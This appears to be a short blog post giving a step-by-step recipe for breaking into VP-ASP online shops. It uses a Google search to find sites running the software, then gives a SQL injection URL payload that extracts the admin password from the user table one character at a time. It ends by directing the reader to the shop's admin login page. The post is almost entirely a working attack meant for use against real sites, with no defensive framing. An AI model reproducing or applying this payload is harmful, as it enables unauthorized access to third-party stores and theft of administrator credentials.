- 1. Find target Website VP-ASP at google.com, with keyword :
allinurl:/vpasp/shopdisplayproducts.asp
- 2. Open target url and add this string at the end :
shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select
%20fldauto,fldpassword%20from%20tbluser%
20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
- 3. Replace the end string url with :
%20'a%25'--
%20'b%25'--
%20'c%25'--
etc...
- 4. If it works, we will get username and admin password
- 5. For admin login to http://.../vpasp/shopadmin.asp
Leave Comment:
Post a Comment